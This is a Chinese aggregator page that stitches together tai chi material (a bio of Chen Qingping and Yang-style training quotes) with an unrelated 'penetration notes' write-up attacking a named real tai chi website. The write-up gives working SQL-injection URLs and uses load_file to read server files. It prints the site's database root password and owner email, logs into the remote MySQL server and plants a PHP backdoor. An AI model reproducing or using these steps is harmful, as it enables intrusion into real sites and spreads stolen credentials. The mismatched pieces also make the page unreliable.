篇3：轻微渗透陈振肖太极网（渗透笔记）

“除小酒”通过精心收集，向本站投稿了3篇太极宗师-陈清平，下面是小编给大家带来的太极宗师-陈清平，以供大家参考，我们一起来看看吧!

篇1：太极宗师-陈清平

太极宗师-陈清平

谈到太极拳发展过程中的`重要人物,众所周知、耳熟能详的首先当属杨式太极拳创始人杨露禅先生.他不但继承并发展了太极拳,对太极拳的推广传播起到了极大的作用,也使陈式太极拳和陈长兴先生随之名扬天下.同时代的另一位太极大家,在太极拳的传承上同样也是功不可没的人物,他就是一代宗师陈清平先生.

篇2：《太极宗师》经典台词

《太极宗师》经典台词

没有打的力量，没有推的力量。象按手，就平推出去，按着出去就行。你捶，打出去就行，没有打的意识，搬拦捶也没有压的意识。都没有单做的。就像所有的动作没有单去做的。

◎ 杨式太极拳练法的一个要求是统一行动，集中一点，全身形成一个劲。具体来说是用意念来指挥你的动作，意念与身脚手统一向一个方向，走同一条路线，集中到一个打击点上，使全身的劲力在一点上发出。

◎ 杨振基推手特色：「我不动，跟你走；你不动，引你动。

在运转当中呢，要分虚实。动的腿，就是虚的，不动腿，都是实的`。然后互相转换。前脚变后脚，后脚变前脚，然后根据动作的要求，来回转换。这是从步法来说。就是要分虚实，不要实腿转。实转以后伤膝盖。希望大家特别注意，不要实腿转。就是要做动作就分虚分实。

◎ 架子和推手本来是一致的，怎么练拳，就怎么推手，从架子上出不了功夫，推手就无从说起。

这几方面做好了以后呢，在做动作当中，注意一切都靠腰来带领的。腰为第一主宰，行于手指，这是在拳论上说的。在练习当中，一切动作先得看腰开始。说腰拉、腰转，都是在腰上做动作。手的动作，他少一些，腰的动作多一些。就是腰把这手脚都带动了。

◎ 位置对了，才能出劲，在某种意义上说，位置就是劲。练拳时一出手，一抬脚就要运动到一定的位置上，长了不行，短了也不行，要无过、无不及、适中。要练到一定的位置上，就要掌握一定的尺度，而这个尺度也要通过练才能掌握。……练到位置一搁就对，需要若干年的认真苦练，同时还要认真体会和思考，逐渐找出准确的位置，不苦练，不去找，永远不会做到。光练不去思索，不用心去找、去悟，也不易做到。当练到一搁就达到正确的位置时，也就为练推手打下了良好的基础。

我们做动作前，要分虚实。分虚实就是就步法上来说的。就是动的脚，是虚的，不动的是实腿。什么都是转换过程当中是先实后虚。站好了以后，才能定位。在定位的时候，怎么说你定好了呢？就是，第一个是前脚尖向前，正前。后脚尖在你的外边，就是往外撇脚。这个前脚尖跟这个后撇脚当中有一个裆的距离，就是你的自然裆的距离。这个没有尺寸，根据个人的情况，保持自然裆的距离。但要注意，站好这位以后，需要注意，前膝盖不能过脚尖。过脚尖以后，你这个前力就往前倾了，力就散了。要能考出来你这个步法站得对不对，有没有力，下盘巩固不巩固，就看你这个前脚，能不能踩住，后脚能不能蹬住。前脚、后蹬，这个说明你这个步法对了。

◎ 推手的作用：推手是锻链运转进退灵活以及掌握各种发放擒拿要领的，是练懂劲的功夫。但是即使掌握了一些要领，如果缺乏功力，也用不上，与别人一接手，别人一按，没有功力就运化不了。

◎ 不会练拳架，不能推手：推手不能长功夫，功夫是拳上练出来的，不是推手推出来的。

要注意我们的手势。这个动作出来，是在上边的，是在下边的？把这个分清楚。是左边，是右边，都要把他做够。不要又不象左边，又不象右边。要注意的是什么呢？就是要认真地找你的位置。咱们手有手的位置，脚有脚的位置。动作出来怎么转，怎么上，都有一定要求。这个方面要严格地要求。绝不是随便出一个手，随便上一个步，随便出个拳，这个不行。应该按规定，你手应该走到哪儿，你就要走到哪儿，用哪儿你就用哪儿。

要持之以恒，不能高兴就练，不高兴就不练。

练太极拳，不是很容易的。就是按规则，按照教你的方法，一式一式地去找。哪个转腰，哪个左转、右转、前转、后转。第一式，太极起势。里边这个动作要领是什么，你手怎么出，脚怎么动。然后再分了虚实以后呢，转向第二个，揽雀尾了，那又该怎么做。这个腰上都给你讲明了，而且力怎么做，也给你说明白了。就是你按着一式一式去找。你有很长时间，你一个礼拜磨一个动作，一共才几十个动作。不到一年的时间，你有很大的收获。这就是，我告诉你，我体验的练拳的。

一切动作都用你的意想着去练，不能够单去做做。再一方面，不要抬肩起肘。你要气要往上提，不能气下沉。所以不要抬肩起肘。而且运转不灵。再一个，就是要气沉丹田。咱们不单做这个东西。不往上提气，就等于气沉丹田。

◎ 「无一虚招」：习拳时手的动作少些，腰的动作多些，腰带手，腰拉手，腰脚手。行拳时，攻防意识强烈，做到手出有名、腿出有名。

◎ 练一套杨式太极拳，是以练腰为主，……一切动作要靠腰带动，腰带、腰拉、腰转、腰脚手。

我们千万注意，杨式太极拳，不是没有呼吸。不单独做呼吸。就是自然呼吸。舌舔上颚，你自由呼吸。你这不是舌舔上颚，你就有唾沫嘛，就要“咽液”，你要咽下去，不要吐了它。这样就是进行自由呼吸。它并不配合你的所有的动作，也不配合你掌，也不配合你的拳，也不配合你收，也不配合你出手。我们这个拳，没有爆发力。蹬脚、分脚、摆莲，这个腿呀，都没有爆发力，就平稳踢出。就是，一蹬腿，一踢腿，就使劲儿。那使劲儿就跟这个，咱们书上我刚给你们讲的“用意不用力”，这个就相违背了。所以教你呢，就是平稳踢出。打摆莲腿，跟那个蹬脚、分脚，千万不要使劲蹬。而且这个踢的时候呢，有个标准，不是说随便踢的。就是把膝盖提起来，跟胯平，平出。就是整个的脚掌啊，打到对方。这个膝盖呀，提的特别高，而且脚啊，都能够超过头。这个不合乎杨式太极拳练法。练这个动作当中，不要踢那么高。

我们做动作需要注意打哪儿看哪儿。

◎ 练拳是从无知到有知，由知到明，由明到精，今天找出了一个劲，明天又悟出另一个劲，慢慢地，拳越打越好。

篇3：轻微渗透陈振肖太极网（渗透笔记）

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48’

返回出错，爆出了路径

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 930

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 931

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 932

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 933

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 934

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 935

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 936

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 937

Warning: disparticlecontent(): Failed opening ’’ for inclusion (include_path=’.;c:\php4\pear’) in d:\site\bin\sys\config.php on line 960

*********************************************************

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20order%20by%209/*

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20order%20by%2010/*

order by 9  正常

order by 10 出错

***************************

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9/*

数字：5

**********************

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,user(),6,7,8,9/*

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,version(),6,7,8,9/*

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,database(),6,7,8,9/*

1：在数字5上输入：user（）

2：在数字5上输入：version（）

3：在数字5上输入：database（）

1：爆出用户名：root@localhost

2：系统版本：4.0.17-nt

3：数据库名：czxtaiji

CMD下Ping了下站点

ping www.czxtaiji.net

TTL=113 （DOS系统）

这里不推荐直接判断是DOS系统，因为TTL值是可以修改的

**********************************

既然是ROOT，看看可以读文件不？

在 数字5的位置输入：load_file()

c:\boot.ini 需要经过16进制编码转换，

为什么要转换？

因为本函数无法处理直接写的路径,只能能使用16进制或者是 Ascii 编码.

所以要将路径转换成 16进制或者是Ascii 编码才可以执行

我们可以打开海洋顶端网PHP注射工具，编码转换-To Hex

c:\boot.ini 转换后得到结果：0x633A5C626F6F742E696E69

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,load_file

(0x633A5C626F6F742E696E69),6,7,8,9/*

页面数字5的位置显示（显示如下说明可以读文件）：

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)part

****************************************

我们继续讲路径：d:\site\bin\sys\config.php 经过编码转换

d:\site\bin\sys\config.php 转换后结果：0x643A5C736974655C62696E5C7379735C636F6E6669672E706870

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),6,7,8,9/*

没有显示任何东西

**************************

查看源代码，发现如下内容：

//==== 系统环境变数定义档 ====//

$def_system_name = “陈振肖太极网”;

$def_version  = “1.0.0”;

$def_Update  = “2

可以读到，但是有长度限制

一个个爆表爆字段，然后找然后，传php马也可以

但万一找不到后台，密码又解不出，那也没用@

*************************************************

我们可以利用  substring 函数

Substring(str,pos,len)函数解决问题.

他的意思是从字符串str的pos位位置起返回len个字符的子串.譬如Substring(load_file(A),50,100)

就是把A的内容的第50个字母开始回显100个给你.那么就能逐段逐段的回显啦.

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),150,50),6,7,8,9/*

读到如下内容：

yName = ”WebAdmin“; $def_myURL = ”www.

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),150,100),6,7,8,9/*

读到如下内容：

yName = “WebAdmin”; $def_myURL = “www.****.net/”; //$def_myURL = “Localho

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),150,150),6,7,8,9/*

读到如下内容：

yName = ”WebAdmin“; $def_myURL = ”www.****.net/“; //$def_myURL = ”Localhost/“; $def_myStreamURL =

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),250,300),6,7,8,9/*

继续读，读到如下内容：

st/”; $def_myStreamURL = “rtsp://www.czxtaiji.net:554/taiji/”; //$def_myStreamURL = “rtsp://Localhost:554/taiji/”; $d

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),50,550),6,7,8,9/*

继续读，读到如下内容:

system_name = “陈振肖太极网”; $def_version = “1.0.0”; $def_Update = “2005/01/01”; $def_myName = “WebAdmin”; $def

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),4,550),6,7,8,9/*

继续读，读到如下内容:

hp //==== 系统环境变数定义档 ====// $def_system_name = “陈振肖太极网”; $def_version = “1.0.0”; $def_Update = “2005

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),510,300),6,7,8,9/*

继续读，读到如下内容:

”Article/“ ; $def_page_top = $def_myURL . ”pages/page_top.htm“ ; $def_page_foot = $def_myURL . ”pages/page_foot_1.htm“

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),410,300),6,7,8,9/*

继续读，读到如下内容:

$def_myEmail = ”chenzhenxiao@sina.com“; //系统目录配置 $def_article_dir = $def_myURL . ”Article/“ ; $def_page_

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),350,300),6,7,8,9/*

继续读，读到如下内容:

Localhost:554/taiji/”; $def_myURL_Title = “陈振肖太极网”; $def_myEmail = “chenzhenxiao@sina.com”; //系统目录配置

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),270,300),6,7,8,9/*

继续读，读到如下内容:

amURL = “rtsp://www.czxtaiji.net:554/taiji/”; //$def_myStreamURL = “rtsp://Localhost:554/taiji/”; $def_myURL_Title = “陈

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),800,300),6,7,8,9/*

继续读，读到如下内容:

oot”; // 资料库帐号 $def_db_passwd = “wenminyjh”; // 管理密码 $def_select_db = “czxtaiji”; // 测试用 - 留言版资料库

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),730,300),6,7,8,9/*

继续读，读到如下内容:

def_db_local = “localhost”; // 资料库连结位址 $def_db_admin = “root”; // 资料库帐号 $def_db_passwd = “wenminyjh”; /

*************到这里，root帐号和密码都读出来了

www.****.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48%20%20and%201=2%20union%20select%201,2,3,4,substring(load_file

(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),780,300),6,7,8,9/*

继续读，读到如下内容:

def_db_admin = “root”; // 资料库帐号 $def_db_passwd = “wenminyjh”; // 管理密码 $def_select_db = “czxtaiji”; // 测?/font>

***************不错，又读出了  数据库名，即使这里我们之前已经知道了

我们来连接下

安装phpStudy.exe

然后在 *:\phpStudy\MySQL\bin 目录下放个 1.bat，里面写cmd，保存，打开，

轻微渗透陈振肖太极网（渗透笔记）

，

。

然后写入：mysql -hwww.****.net -uroot -p123456

说下把，-h后面的是域名，-u后面的是帐号，-p后面是密码

返回如下内容：

E:\phpStudy\MySQL\bin>mysql -hwww.czxtaiji.net -uroot -pwenminyjh

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 5078

Server version: 4.0.17-nt

Type ’help;’ or ’\h’ for help. Type ’\c’ to clear the buffer.

mysql>

**************************************

mysql>  select version();

+-----------+

| version() |

+-----------+

| 4.0.17-nt |

+-----------+

1 row in set (0.19 sec)

mysql>

********************************************

mysql> show databases;

+------------+

| Database   |

+------------+

| chat       |

| czx_discuz |

| czx_uc     |

| czxtaiji   |

| dear       |

| mmm        |

| mydb       |

| mysql      |

| mytestdb   |

| sss        |

| taiji      |

| tx         |

| 复件 taiji     |

+------------+

13 rows in set (0.21 sec)

mysql>

***************************************这里是数据库，大家看下

我们依次执行以下语句：

create table a(str TEXT);

insert into a values("

select * from a into outfile ’d:\\site\\bin\\ai.php’;

其中”

d:\\site\\bin\\这个是PHPMYADMIN的路径,d:\\site\\是绝对路径。。

确定后成功返回结果,然后用lanker微型PHP后门客户端连接上传PHP木马，

www.****.net/bin/ai.php 密码：a

可以查看服务器信息，CMD执行出错，无法上传文件，3389端口被改